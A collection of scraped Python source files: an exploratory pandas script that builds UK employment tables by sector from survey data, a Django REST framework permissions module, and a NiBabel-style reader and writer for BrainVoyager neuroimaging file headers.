pd.set_option('display.max_rows', 40)\n\n# import employment\nfrom employment import *\n\nraw_data_dir = shared_drive + 'Economic Estimates/Employment - Helen/max-csv-data/'\n\n# years = range(2011, 2017 + 1)\n# raw_data = {y:pd.read_csv(raw_data_dir + 'raw_' + str(y) + \"_df.csv\") for y in years}\n\nweight_col = 'PWTA17'\n# raw, meta = pyreadstat.read_sav(shared_drive + 'Economic Estimates/APS/2017/APSP_JD17_CLIENT_PWTA17.sav', usecols=raw_columns + [weight_col])\nraw, meta = pyreadstat.read_sav('APSP_JD17_CLIENT_PWTA17.sav', usecols=spss_columns + [weight_col])\n# raw, meta = pyreadstat.read_sav(shared_drive + 'Economic Estimates/APS/2017/temp/2017_Data_CI.sav')\n\nlabels_df = pyreadstat.set_value_labels(raw, meta, formats_as_category=True)\ndf = raw.copy()\n\ndf_cleaned_columns = clean_columns_func(df, labels_df)\n\ndemographics = ['age', 'ethnicity', 'ftpt', 'sex', 'nssec']\n\nagg = agg_to_sic({2017: df_cleaned_columns}, 2017, demographics)\n\n\n# age tables\nage_sic = single_cat_sic_agg_func(agg, 'age')\nage_sector = sic_to_sector(age_sic, 'age')\n\n# concatenate sectors with all_dcms and cs\ncs = make_cs_data({2017: df_cleaned_columns}, 2017, 'age')\noverlap = make_overlap_data({2017: df_cleaned_columns}, 2017, 'age')\ntotal_uk = make_total_uk_data({2017: df_cleaned_columns}, 2017, 'age')\n\nage_all_sectors = combine_sector_cs_overlap(age_sector, cs, overlap, 'age')\n\n\n\n\n# region tables\nregion_sic = single_cat_sic_agg_func(agg, 'region')\nregion_sector = sic_to_sector(region_sic, 'region')\n\n# concatenate sectors with all_dcms and cs\ncs = make_cs_data({2017: df_cleaned_columns}, 2017, 'region')\noverlap = make_overlap_data({2017: df_cleaned_columns}, 2017, 'region')\ntotal_uk = make_total_uk_data({2017: df_cleaned_columns}, 2017, 'region')\n\nregion_index = ['North East', 'North West', 'Yorkshire and the Humber', 'East Midlands', 'West Midlands', 'East of England', 'London', 'South East', 'South West', 'Wales', 'Scotland', 'Northern Ireland', 'Outside UK']\ndf = combine_sector_cs_overlap(region_sector, cs, overlap, 'region').copy()\ndf = df.reindex(region_index, level='region')\n# df['count'] = df['count'].astype(.astype(np.int64))\ndf = df.sort_index()\n\nregion_excel_combined = get_region_excel_combined().sort_index()\nregion_excel_combined.equals(df)\ndf.dtypes\nregion_excel_combined.dtypes\n\n\nregion = df.copy()\ntest = (region_excel_combined == df)\ntest.to_csv('temp.csv')\nregion_excel_combined.columns\nregion.columns\n\n# make combined data for cat\ndef create_final_data(cat):\n sic_data = single_cat_sic_agg_func(agg, cat)\n sector_data = sic_to_sector(sic_data, cat)\n\n # concatenate sectors with all_dcms and cs\n cs = make_cs_data({2017: df_cleaned_columns}, 2017, cat)\n overlap = make_overlap_data({2017: df_cleaned_columns}, 2017, cat)\n total_uk = make_total_uk_data({2017: df_cleaned_columns}, 2017, cat)\n\n df = combine_sector_cs_overlap(sector_data, cs, overlap, total_uk, cat).sort_index()\n df = df.reset_index()\n df['year'] = 2017\n df = final_column_cleaning(df, cat)\n df = df.set_index(['year', 'sector', cat, 'emptype'])\n return df\n\n\nexcel_table_schema = convert_json_to_python('excel_table_schema.JSON')\n\nregion = create_final_data('region').reset_index()\nage = create_final_data('age').reset_index()\nnssec = create_final_data('nssec').reset_index()\n\nregion[region['sector'] == 'total_uk']\nregion[region['sector'] == 'creative']\nage[age['sector'] == 'total_uk']\nage[age['sector'] == 'creative']\n\n\n# make table from final data\ndef make_table(cat, index, header, subset_col=None, subset_value=None, perc_col=None, total_perc_colname=None):\n all_vars = index + header + [subset_col]\n df = create_final_data(cat).reset_index()\n if subset_col == 'sector':\n df = df[df['sector'] == subset_value]\n\n if 'sector' not in all_vars:\n df = df[df['sector'] == 'all_dcms']\n\n tb = pd.pivot_table(df, values='count', index=index, columns=header, aggfunc=np.sum)\n\n tuples = [(i, 'Number of jobs') for i in tb.columns]\n tb.columns = pd.MultiIndex.from_tuples(tuples)\n pretty_cols = ['Employed', 'Self-employed']\n tb.columns = tb.columns.set_levels(pretty_cols,level=0)\n\n if cat == 'region':\n tb = tb.reindex(breakdown_columns_dict['region']['level_order'])\n tb.loc['all_uk_dcms'] = tb.sum()\n\n tb['Total employment'] = tb.sum(axis=1)\n if perc_col:\n cols = ['emp', 'selfemp']\n for col in pretty_cols:\n tb.insert(tb.columns.get_loc((col, 'Number of jobs'))+1, (col, '% of total'), round(tb[col]['Number of jobs'] / tb['Total employment'] * 100, 1))\n\n if total_perc_colname:\n tb[total_perc_colname] = round(tb['Total employment'] / df.sum()['count'] * 100, 1)\n\n return tb\n\ntest = pd.DataFrame({'hi': [2,3], 'hi': [5,6]})\nmake_table('age', index=['sector'], header=['emptype', 'age'])\nregion_table = make_table(cat='region', index=['region'], header=['emptype'], perc_col=True, total_perc_colname=\"% of all jobs in region\")\nregion_cs_table = make_table(cat='region', index=['region'], header=['emptype'], subset_col='sector', subset_value='civil_society', perc_col=True, total_perc_colname=\"% of Civil Society jobs in all regions\")\nregion_ci_table = make_table(cat='region', index=['region'], header=['emptype'], subset_col='sector', subset_value='creative', perc_col=True, total_perc_colname=\"% of Creative Industries jobs in all regions\")\nregion_culture_table = make_table(cat='region', index=['region'], header=['emptype'], subset_col='sector', subset_value='culture', perc_col=True, total_perc_colname=\"% of Cultural Sector jobs in all regions\")\nregion_digital_table = make_table(cat='region', index=['region'], header=['emptype'], subset_col='sector', subset_value='digital', perc_col=True, total_perc_colname=\"% of Digital Sector jobs in all regions\")\nregion_gambling_table = make_table(cat='region', index=['region'], header=[], subset_col='sector', subset_value='gambling', total_perc_colname=\"% of Gambling Sector jobs in all regions\")\nregion_sport_table = make_table(cat='region', index=['region'], header=['emptype'], subset_col='sector', subset_value='sport', perc_col=True, total_perc_colname=\"% of Sport jobs in all regions\")\nregion_telecoms_table = make_table(cat='region', index=['region'], header=[], subset_col='sector', subset_value='telecoms', total_perc_colname=\"% of Telecoms sector jobs in all regions\")\n\nmake_table('nssec', index=['sector'], header=['emptype', 'nssec'])\n\n['age', 'ethnicity', 'ftpt', 'sex', 'nssec']\n\ncat = 'nssec'\ncat = 'age'\nsic_data = single_cat_sic_agg_func(agg, cat)\nsector_data = sic_to_sector(sic_data, cat)\n\n# concatenate sectors with all_dcms and cs\ncs = make_cs_data({2017: df_cleaned_columns}, 2017, cat)\noverlap = make_overlap_data({2017: df_cleaned_columns}, 2017, cat)\n\ndf = combine_sector_cs_overlap(sector_data, cs, overlap, cat).sort_index()\ndf = df.reset_index()\ndf['year'] = 2017\ndf = df.set_index(['year', 'sector', cat, 'emptype'])\n\n\n\ndf_cleaned_columns.columns\n\n\n\n\n\n\n\n# old\n# make single cat sector table\ndf = agg.copy()\ndf['emp'] = df['mainemp'] + df['secondemp']\ndf['selfemp'] = df['mainselfemp'] + df['secondselfemp']\ndf.drop(['mainemp', 'secondemp', 'mainselfemp', 'secondselfemp'], axis=1, inplace=True)\n\ndf = pd.merge(df, sic_mappings.loc[:,['sic', 'sector']], how = 'inner')\n\ndf = df[['sector', 'sic', 'year', 'emp', 'selfemp', 'AGES']]\n\ndf = pd.melt(df, id_vars=['sector', 'sic', 'year', 'AGES'], var_name='emptype', value_name='count')\n\ndf = df.loc[:, ['sector', 'AGES', 'emptype', 'count']].groupby(['sector', 'AGES', 'emptype']).sum()\n\n\n\n\n# tests\n\n\n\n\n\n\n\n\n\n\ndf['SIC'] = df.apply(lambda x: int(x.SIC[0:2] + x.SIC[3:5]), axis=1)\ndf = df.set_index(['SIC', breakdown_columns_dict[cat]['spss_name']]).sort_index()\ndf = df.reset_index()\n\n# sum sics for each sector\n\nsicss = pd.Series(np.unique(sic_mappings.sic))\n\n# add main and second jobs\n# might need to do a fill na first\ndf = df.fillna(0)\ndf['employed'] = df['M_E_DCMS'] + df['S_E_DCMS']\ndf['self_employed'] = df['M_SE_DCMS'] + df['S_SE_DCMS']\ndf = df[['SIC', 'AGES', 'employed', 'self_employed']]\ndf.columns = ['sic', 'AGES', 'employed', 'self_employed']\n\ndf_sector = pd.merge(df, sic_mappings.loc[:,['sic', 'sector']], how = 'inner')\ndf_sector.columns\nagg2 = df_sector[['AGES', 'employed', 'self_employed', 'sector']].groupby(['sector', 'AGES']).sum()\ndf = agg2.copy()\n\n# append civil civil_society\ndf = df_cleaned_columns.copy()\n# df = df.loc[df['cs_flag'] == 1].copy()\n# df = df[['AGES', 'employed', 'self_employed', 'sector']].groupby(['sector', 'AGES']).sum()\n# dftemp_cs['sector'] = 'civil_society'\n\n# subtract overlap from alldcms\ndf = df.reset_index()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"547652016","text":"# Same App importing\nfrom profiles_api.models import UserProfile\n\n# API importing\nfrom rest_framework.permissions import BasePermission, SAFE_METHODS\n\n\nclass UpdateOwnProfile(BasePermission):\n \"\"\"Allow users to edit their own profile\"\"\"\n\n def has_object_permission(self, request, view, obj):\n \"\"\"Check user is trying to edit their own profile\"\"\"\n\n if request.method in SAFE_METHODS:\n return True\n\n return obj.id == request.user.id\n\n\nclass PostOwnStatus(BasePermission):\n \"\"\"Allow users to edit their own profile\"\"\"\n\n def has_object_permission(self, request, view, obj):\n \"\"\"Checks the user is trying to update his own status\"\"\"\n\n if request.method in SAFE_METHODS:\n return True\n\n return obj.user_profile.id == request.user.id\n\n\n\n","sub_path":"profiles_api/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"528045978","text":"# emacs: -*- mode: python-mode; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n# ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the NiBabel package for the\n# copyright and license terms.\n#\n# ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Reading / writing functions for Brainvoyager (BV) file formats.\n\nplease look at the support site of BrainInnovation for further informations\nabout the file formats: http://support.brainvoyager.com/\n\nThis file implements basic functionality for BV file formats. Look into bv_*.py\nfiles for implementations of the different file formats.\n\nAuthor: Thomas Emmerling\n\"\"\"\nfrom __future__ import division\nimport numpy as np\n\nfrom ..volumeutils import array_to_file, array_from_file, make_dt_codes\nfrom ..spatialimages import Header, HeaderDataError, SpatialImage\nfrom ..fileholders import copy_file_map\nfrom ..arrayproxy import CArrayProxy\nfrom .. import imageglobals as imageglobals\nfrom ..batteryrunners import BatteryRunner, Report\nfrom struct import pack, unpack, calcsize\nfrom ..externals import OrderedDict\n\n_dtdefs = ( # code, conversion function, equivalent dtype, aliases\n (1, 'int16', np.uint16),\n (2, 'float32', np.float32),\n (3, 'uint8', np.uint8))\n\n# Make full code alias bank, including dtype column\ndata_type_codes = make_dt_codes(_dtdefs)\n\n# Set example hdr_dict_proto for BV file formats\nBV_HDR_DICT_PROTO = (\n ('resolution', 'h', 3),\n ('x_start', 'h', 57),\n ('x_end', 'h', 231),\n ('y_start', 'h', 52),\n ('y_end', 'h', 172),\n ('z_start', 'h', 59),\n ('z_end', 'h', 197),\n)\n\n\ndef read_c_string(f, n_strings=1, bufsize=1000, start_pos=None, strip=True,\n rewind=False):\n \"\"\"Read a zero-terminated string from a file object.\n\n Read and return a zero-terminated string from a file object.\n\n Parameters\n ----------\n f : fileobj\n File object to use. Object should implement tell, seek, and read.\n n_strings: int, optional\n Number of strings to search (and return). Default is 1.\n bufsize: int, optional\n Define the buffer size that should be searched for the string.\n Default is 1000 bytes.\n start_pos: int, optional\n Define the start file position from which to search. If None then start\n where the file object currently points to. Default is None.\n strip : bool, optional\n Whether to strip the trailing zero from the returned string.\n Default is True.\n rewind: bool, optional\n Whether the fileobj f should be returned to the initial position after\n reading. Default is False.\n\n Returns\n -------\n str_list : generator of string(s)\n \"\"\"\n current_pos = f.tell()\n suffix = b'' if strip else b'\\x00'\n if start_pos is not None:\n f.seek(start_pos)\n data = f.read(bufsize)\n lines = data.split(b'\\x00')\n str_list = []\n if rewind:\n f.seek(current_pos)\n else:\n offsets = [len(lines[s]) + 1 for s in range(n_strings)]\n f.seek(current_pos + sum(offsets))\n for s in range(n_strings):\n str_list.append(lines[s] + suffix)\n return str_list\n\n\ndef parse_BV_header(hdr_dict_proto, fileobj, parent_hdr_dict=None):\n \"\"\"Parse the header of a BV file format.\n\n This function can be (and is) called recursively to iterate through nested\n fields (e.g. the ``prts`` field of the VTC header).\n\n Parameters\n ----------\n hdr_dict_proto: tuple\n tuple of format described in Notes below.\n fileobj : fileobj\n File object to use. Make sure that the current position is at the\n beginning of the header (e.g. at 0). Object should implement tell,\n seek, and read.\n parent_hdr_dict: None or OrderedDict, optional\n Default is None. None results in empty `OrderedDict`.\n When parse_BV_header() is called recursively the already filled\n (parent) hdr_dict is passed to give access to n_fields_name fields\n outside the current scope (see below).\n\n Returns\n -------\n hdr_dict : OrderedDict\n An OrderedDict containing all header fields parsed from the file.\n\n Notes\n -----\n The description of `hdr_dict_proto` below is notated according to\n https://docs.python.org/3/reference/introduction.html#notation\n\n hdr_dict_proto ::= ((element_proto))*\n element_proto ::= '(' name ',' pack_format ',' default ')' |\n '(' name ',' pack_format ',' '(' default ','\n c_fields_name ',' c_fields_value ')' ')' |\n '(' name ',' hdr_dict_proto ',' n_fields_name ')'\n pack_format ::= 'b' | 'h' | 'f' | 'z'\n name ::= str\n n_fields_name ::= str\n c_fields_name ::= str\n c_fields_value ::= int | float | bytes\n default ::= int | float | bytes\n\n The pack_format codes have meaning::\n\n b := signed char (1 byte)\n B := unsigned char (1 byte)\n h := signed short integer (2 bytes)\n i := signed integer (4 bytes)\n I := unsigned integer (4 bytes)\n f := float (4 bytes)\n z := zero-terminated string (variable bytes)\n\n The n_fields_name is used to indicate the name of a header field that\n contains a number for nested header fields loops (e.g. 'NrOfSubMaps' in the\n VMP file header).\n\n The c_fields_name and c_fields_value parameters are used for header fields\n that are only written depending on the value of another header field (e.g.\n 'NrOfLags' in the VMP file header).\n \"\"\"\n hdr_dict = OrderedDict()\n for name, pack_format, def_or_name in hdr_dict_proto:\n # handle zero-terminated strings\n if pack_format == 'z':\n value = read_c_string(fileobj)[0]\n # handle array fields\n elif isinstance(pack_format, tuple):\n value = []\n # check the length of the array to expect\n if def_or_name in hdr_dict:\n n_values = hdr_dict[def_or_name]\n else:\n n_values = parent_hdr_dict[def_or_name]\n for i in range(n_values):\n value.append(parse_BV_header(pack_format, fileobj, hdr_dict))\n # handle conditional fields\n elif isinstance(def_or_name, tuple):\n if hdr_dict[def_or_name[1]] == def_or_name[2]:\n raw_bytes = fileobj.read(calcsize(pack_format))\n value = unpack('<' + pack_format, raw_bytes)[0]\n else: # assign the default value\n value = def_or_name[0]\n else: # unpack raw_bytes of type pack_format\n raw_bytes = fileobj.read(calcsize(pack_format))\n value = unpack('<' + pack_format, raw_bytes)[0]\n hdr_dict[name] = value\n return hdr_dict\n\n\ndef pack_BV_header(hdr_dict_proto, hdr_dict, parent_hdr_dict=None):\n \"\"\"Pack the header of a BV file format into a byte string.\n\n This function can be (and is) called recursively to iterate through nested\n fields (e.g. the ``prts`` field of the VTC header).\n\n Parameters\n ----------\n hdr_dict_proto: tuple\n tuple of format described in Notes of :func:`parse_BV_header`\n hdr_dict: OrderedDict\n hdr_dict that contains the fields and values to for the respective\n BV file format.\n parent_hdr_dict: None or OrderedDict, optional\n Default is None. None results in empty `OrderedDict`.\n When parse_BV_header() is called recursively the already filled\n (parent) hdr_dict is passed to give access to n_fields_name fields\n outside the current scope (see below).\n\n Returns\n -------\n binaryblock : bytes\n Binary representation of header ready for writing to file.\n \"\"\"\n binary_parts = []\n for name, pack_format, def_or_name in hdr_dict_proto:\n value = hdr_dict[name]\n # handle zero-terminated strings\n if pack_format == 'z':\n part = value + b'\\x00'\n # handle array fields\n elif isinstance(pack_format, tuple):\n # check the length of the array to expect\n if def_or_name in hdr_dict:\n n_values = hdr_dict[def_or_name]\n else:\n n_values = parent_hdr_dict[def_or_name]\n sub_parts = []\n for i in range(n_values):\n sub_parts.append(pack_BV_header(pack_format, value[i],\n hdr_dict))\n part = b''.join(sub_parts)\n # handle conditional fields\n elif isinstance(def_or_name, tuple):\n if hdr_dict[def_or_name[1]] == def_or_name[2]:\n part = pack('<' + pack_format, value)\n else:\n # skip to next header field if condition is not met\n continue\n else:\n part = pack('<' + pack_format, value)\n binary_parts.append(part)\n return b''.join(binary_parts)\n\n\ndef calc_BV_header_size(hdr_dict_proto, hdr_dict, parent_hdr_dict=None):\n \"\"\"Calculate the binary size of a hdr_dict for a BV file format header.\n\n This function can be (and is) called recursively to iterate through nested\n fields (e.g. the prts field of the VTC header).\n\n Parameters\n ----------\n hdr_dict_proto: tuple\n tuple of format described in Notes of :func:`parse_BV_header`\n hdr_dict: OrderedDict\n hdr_dict that contains the fields and values to for the respective\n BV file format.\n parent_hdr_dict: None or OrderedDict, optional\n Default is None. None results in empty `OrderedDict`.\n When parse_BV_header() is called recursively the already filled\n (parent) hdr_dict is passed to give access to n_fields_name fields\n outside the current scope (see below).\n\n Returns\n -------\n hdr_size : int\n Size of header when packed into bytes ready for writing to file.\n \"\"\"\n hdr_size = 0\n for name, pack_format, def_or_name in hdr_dict_proto:\n value = hdr_dict[name]\n # handle zero-terminated strings\n if pack_format == 'z':\n hdr_size += len(value) + 1\n # handle array fields\n elif isinstance(pack_format, tuple):\n # check the length of the array to expect\n if def_or_name in hdr_dict:\n n_values = hdr_dict[def_or_name]\n # handle cases when n_values is resides outside of the\n # current scope (e.g. nr_of_timepoints in VMP_HDR_DICT_PROTO)\n else:\n n_values = parent_hdr_dict[def_or_name]\n for i in range(n_values):\n # recursively iterate through the fields of all items\n # in the array\n hdr_size += calc_BV_header_size(pack_format, value[i],\n hdr_dict)\n # handle conditional fields\n elif isinstance(def_or_name, tuple):\n if hdr_dict[def_or_name[1]] == def_or_name[2]:\n hdr_size += calcsize(pack_format)\n else:\n continue\n else:\n hdr_size += calcsize(pack_format)\n return hdr_size\n\n\ndef update_BV_header(hdr_dict_proto, hdr_dict_old, hdr_dict_new,\n parent_old=None, parent_new=None):\n \"\"\"Update a hdr_dict after changed nested-loops-number or conditional fields.\n\n This function can be (and is) called recursively to iterate through nested\n fields (e.g. the prts field of the VTC header).\n\n Parameters\n ----------\n hdr_dict_proto: tuple\n tuple of format described in Notes of :func:`parse_BV_header`\n hdr_dict_old: OrderedDict\n hdr_dict before any changes.\n hdr_dict_new: OrderedDict\n hdr_dict with changed fields in n_fields_name or c_fields_name fields.\n parent_old: None or OrderedDict, optional\n When update_BV_header() is called recursively the not yet updated\n (parent) hdr_dict is passed to give access to n_fields_name fields\n outside the current scope (see below).\n parent_new: None or OrderedDict, optional\n When update_BV_header() is called recursively the not yet updated\n (parent) hdr_dict is passed to give access to n_fields_name fields\n outside the current scope (see below).\n\n Returns\n -------\n hdr_dict_new : OrderedDict\n An updated version hdr_dict correcting effects of changed nested and\n conditional fields.\n \"\"\"\n for name, pack_format, def_or_name in hdr_dict_proto:\n # handle only nested loop fields\n if not isinstance(pack_format, tuple):\n continue\n # calculate the change of array length and the new array length\n if def_or_name in hdr_dict_old:\n delta_values = (hdr_dict_new[def_or_name] -\n hdr_dict_old[def_or_name])\n n_values = hdr_dict_new[def_or_name]\n else:\n delta_values = (parent_new[def_or_name] -\n parent_old[def_or_name])\n n_values = parent_new[def_or_name]\n if delta_values > 0: # add nested loops\n for i in range(delta_values):\n hdr_dict_new[name].append(_proto2default(pack_format,\n hdr_dict_new))\n elif delta_values < 0: # remove nested loops\n for i in range(abs(delta_values)):\n hdr_dict_new[name].pop()\n # loop over nested fields\n for i in range(n_values):\n update_BV_header(pack_format, hdr_dict_old[name][i],\n hdr_dict_new[name][i], hdr_dict_old,\n hdr_dict_new)\n return hdr_dict_new\n\n\ndef _proto2default(proto, parent_default_hdr=None):\n \"\"\"Helper for creating a BV header OrderedDict with default parameters.\n\n Create an OrderedDict that contains keys with the header fields, and\n default values.\n\n See :func:`parse_BV_header` for description of `proto` format.\n \"\"\"\n default_hdr = OrderedDict()\n for name, pack_format, def_or_name in proto:\n if isinstance(pack_format, tuple):\n value = []\n # check the length of the array to expect\n if def_or_name in default_hdr:\n n_values = default_hdr[def_or_name]\n else:\n n_values = parent_default_hdr[def_or_name]\n for i in range(n_values):\n value.append(_proto2default(pack_format, default_hdr))\n default_hdr[name] = value\n # handle conditional fields\n elif isinstance(def_or_name, tuple):\n default_hdr[name] = def_or_name[0]\n else:\n default_hdr[name] = def_or_name\n return default_hdr\n\n\ndef combine_st(st_array, inv=False):\n \"\"\"Combine spatial transformation matrices.\n\n This recursive function returns the dot product of all spatial\n transformation matrices given in st_array for applying them in one go.\n The order of multiplication follow the order in the given array.\n\n Parameters\n ----------\n st_array: array of shape (n, 4, 4)\n array filled with n transformation matrices of shape (4, 4)\n\n inv: boolean\n Set to true to invert the transformation matrices before\n multiplication.\n\n Returns\n -------\n combined_st : array of shape (4, 4)\n \"\"\"\n if len(st_array) == 1:\n if inv:\n return np.linalg.inv(st_array[0])\n else:\n return st_array[0]\n if inv:\n return np.dot(np.linalg.inv(st_array[0, :, :]),\n combine_st(st_array[1:, :, :], inv=inv))\n else:\n return np.dot(st_array[0, :, :],\n combine_st(st_array[1:, :, :], inv=inv))\n\n\ndef parse_st(st_dict):\n \"\"\"Parse spatial transformation stored in a BV header OrderedDict.\n\n This function parses a given OrderedDict from a BV header field and returns\n a spatial transformation matrix as a numpy array.\n\n Parameters\n ----------\n st_dict: OrderedDict\n OrderedDict filled with transformation matrices of shape (4, 4)\n\n Returns\n -------\n st_array : array of shape (4, 4)\n \"\"\"\n if st_dict['nr_of_trans_val'] != 16:\n raise BvError('spatial transformation has to be of shape (4, 4)')\n st_array = []\n for v in range(st_dict['nr_of_trans_val']):\n st_array.append(st_dict['trans_val'][v]['value'])\n return np.array(st_array).reshape((4, 4))\n\n\nclass BvError(Exception):\n \"\"\"Exception for BV format related problems.\n\n To be raised whenever there is a problem with a BV fileformat.\n \"\"\"\n\n pass\n\n\nclass BvFileHeader(Header):\n \"\"\"Class to hold information from a BV file header.\"\"\"\n\n # Copies of module-level definitions\n _data_type_codes = data_type_codes\n _field_recoders = {'datatype': data_type_codes}\n\n # format defaults\n # BV files are radiological (left-is-right) by default\n # (VTC files have a flag for that, however)\n default_xflip = True\n default_endianness = '<' # BV files are always little-endian\n allowed_dtypes = [1, 2, 3]\n default_dtype = 2\n allowed_dimensions = [3]\n data_layout = 'C'\n hdr_dict_proto = BV_HDR_DICT_PROTO\n\n def __init__(self,\n hdr_dict=None,\n endianness=default_endianness,\n check=True,\n offset=None):\n \"\"\"Initialize header from binary data block.\n\n Parameters\n ----------\n hdr_dict : None or OrderedDict, optional\n An OrderedDict containing all header fields parsed from the file.\n By default, None, in which case we create a default hdr_dict from\n the corresponding _HDR_DICT_PROTO\n endianness : {None, '<','>', other endian code} string, optional\n endianness of the binaryblock. If None, guess endianness\n from the data.\n check : bool, optional\n Whether to check content of header in initialization.\n Default is True.\n offset : int, optional\n offset of the actual data into to binary file (in bytes)\n \"\"\"\n if endianness != self.default_endianness:\n raise BvError('BV files are always little-endian')\n self.endianness = self.default_endianness\n if hdr_dict is None:\n hdr_dict = _proto2default(self.hdr_dict_proto)\n self._hdr_dict = hdr_dict\n if offset is None:\n self.set_data_offset(calc_BV_header_size(\n self.hdr_dict_proto, self._hdr_dict))\n if 'framing_cube' in self._hdr_dict:\n self._framing_cube = self._hdr_dict['framing_cube']\n else:\n self._framing_cube = self._guess_framing_cube()\n if check:\n self.check_fix()\n return\n\n @classmethod\n def from_fileobj(klass, fileobj, endianness=default_endianness,\n check=True):\n \"\"\"Return read structure with given or guessed endiancode.\n\n Parameters\n ----------\n fileobj : file-like object\n Needs to implement ``read`` method\n endianness : None or endian code, optional\n Code specifying endianness of read data\n\n Returns\n -------\n header : BvFileHeader object\n BvFileHeader object initialized from data in fileobj\n \"\"\"\n hdr_dict = parse_BV_header(klass.hdr_dict_proto, fileobj)\n offset = fileobj.tell()\n return klass(hdr_dict, endianness, check, offset)\n\n @classmethod\n def from_header(klass, header=None, check=False):\n \"\"\"Class method to create header from another header.\n\n Parameters\n ----------\n header : ``Header`` instance or mapping\n a header of this class, or another class of header for\n conversion to this type\n check : {True, False}\n whether to check header for integrity\n\n Returns\n -------\n hdr : header instance\n fresh header instance of our own class\n \"\"\"\n # own type, return copy\n if type(header) == klass:\n obj = header.copy()\n if check:\n obj.check_fix()\n return obj\n # not own type, make fresh header instance\n obj = klass(check=check)\n if header is None:\n return obj\n try: # check if there is a specific conversion routine\n mapping = header.as_bv_map()\n except AttributeError:\n # most basic conversion\n obj.set_data_dtype(header.get_data_dtype())\n obj.set_data_shape(header.get_data_shape())\n obj.set_zooms(header.get_zooms())\n return obj\n # header is convertible from a field mapping\n for key, value in mapping.items():\n try:\n obj[key] = value\n except (ValueError, KeyError):\n # the presence of the mapping certifies the fields as\n # being of the same meaning as for BV types\n pass\n # set any fields etc that are specific to this format (overriden by\n # sub-classes)\n obj._set_format_specifics()\n # Check for unsupported datatypes\n orig_code = header.get_data_dtype()\n try:\n obj.set_data_dtype(orig_code)\n except HeaderDataError:\n raise HeaderDataError('Input header %s has datatype %s but '\n 'output header %s does not support it'\n % (header.__class__,\n header.get_value_label('datatype'),\n klass))\n if check:\n obj.check_fix()\n return obj\n\n def copy(self):\n \"\"\"Copy object to independent representation.\n\n The copy should not be affected by any changes to the original\n object.\n \"\"\"\n return self.__class__(self._hdr_dict)\n\n def _set_format_specifics(self):\n \"\"\"Utility routine to set format specific header stuff.\"\"\"\n pass\n\n def data_from_fileobj(self, fileobj):\n \"\"\"Read data array from `fileobj`.\n\n Parameters\n ----------\n fileobj : file-like\n Must be open, and implement ``read`` and ``seek`` methods\n\n Returns\n -------\n arr : ndarray\n data array\n \"\"\"\n dtype = self.get_data_dtype()\n shape = self.get_data_shape()\n offset = self.get_data_offset()\n return array_from_file(shape, dtype, fileobj, offset,\n order=self.data_layout)\n\n def get_data_dtype(self):\n \"\"\"Get numpy dtype for data.\n\n For examples see ``set_data_dtype``\n \"\"\"\n if 'datatype' in self._hdr_dict:\n code = self._hdr_dict['datatype']\n else:\n code = self.default_dtype\n dtype = self._data_type_codes.dtype[code]\n return dtype.newbyteorder(self.endianness)\n\n def set_data_dtype(self, datatype):\n \"\"\"Set numpy dtype for data from code or dtype or type.\"\"\"\n try:\n code = self._data_type_codes[datatype]\n except KeyError:\n raise HeaderDataError(\n 'data dtype \"%s\" not recognized' % datatype)\n if code not in self.allowed_dtypes:\n raise HeaderDataError(\n 'data dtype \"%s\" not supported' % datatype)\n dtype = self._data_type_codes.dtype[code]\n if 'datatype' in self._hdr_dict.keys():\n self._hdr_dict['datatype'] = code\n return\n if dtype.newbyteorder(self.endianness) != self.get_data_dtype():\n raise HeaderDataError(\n 'File format does not support setting of header!')\n\n @property\n def xflip(self):\n return self.default_xflip\n\n @xflip.setter\n def xflip(self, xflip):\n \"\"\"Set xflip for data.\"\"\"\n if xflip is True:\n return\n else:\n raise BvError('cannot change Left-right convention!')\n\n def get_data_shape(self):\n \"\"\"Get shape of data.\"\"\"\n raise NotImplementedError\n\n def set_data_shape(self, shape):\n \"\"\"Set shape of data.\"\"\"\n raise NotImplementedError\n\n def get_base_affine(self):\n \"\"\"Get affine from basic (shared) header fields.\n\n Note that we get the translations from the center of the\n (guessed) framing cube of the referenced VMR (anatomical) file.\n\n Internal storage of the image is ZYXT, where (in patient coordinates/\n real world orientations):\n Z := axis increasing from right to left (R to L)\n Y := axis increasing from superior to inferior (S to I)\n X := axis increasing from anterior to posterior (A to P)\n T := volumes (if present in file format)\n \"\"\"\n zooms = self.get_zooms()\n if not self.xflip:\n # make the BV internal Z axis neurological (left-is-left);\n # not default in BV files!\n zooms = (-zooms[0], zooms[1], zooms[2])\n\n # compute the rotation\n rot = np.zeros((3, 3))\n # make the flipped BV Z axis the new R axis\n rot[:, 0] = [-zooms[0], 0, 0]\n # make the flipped BV X axis the new A axis\n rot[:, 1] = [0, 0, -zooms[2]]\n # make the flipped BV Y axis the new S axis\n rot[:, 2] = [0, -zooms[1], 0]\n\n # compute the translation\n fcc = np.array(self.framing_cube) / 2 # center of framing cube\n bbc = np.array(self.get_bbox_center()) # center of bounding box\n tra = np.dot((bbc - fcc), rot)\n\n # assemble\n M = np.eye(4, 4)\n M[0:3, 0:3] = rot\n M[0:3, 3] = tra.T\n\n return M\n\n def get_best_affine(self):\n return self.get_base_affine()\n\n def get_default_affine(self):\n return self.get_base_affine()\n\n def get_affine(self):\n return self.get_base_affine()\n\n def _guess_framing_cube(self):\n \"\"\"Guess the dimensions of the framing cube.\n\n Guess the dimensions of the framing cube that constitutes the\n coordinate system boundaries for the bounding box.\n\n For most BV file formats this need to be guessed from\n x_end, y_end, and z_end in the header.\n \"\"\"\n # then start guessing...\n hdr = self._hdr_dict\n # get the ends of the bounding box (highest values in each dimension)\n x = hdr['x_end']\n y = hdr['y_end']\n z = hdr['z_end']\n\n # compare with possible framing cubes\n for fc in [256, 384, 512, 768, 1024]:\n if any([d > fc for d in (x, y, z)]):\n continue\n else:\n return fc, fc, fc\n\n @property\n def framing_cube(self):\n \"\"\"Get the dimensions of the framing cube.\n\n Get the dimensions of the framing cube that constitutes the\n coordinate system boundaries for the bounding box.\n For most BV file formats this need to be guessed from\n x_end, y_end, and z_end in the header.\n \"\"\"\n return self._framing_cube\n\n 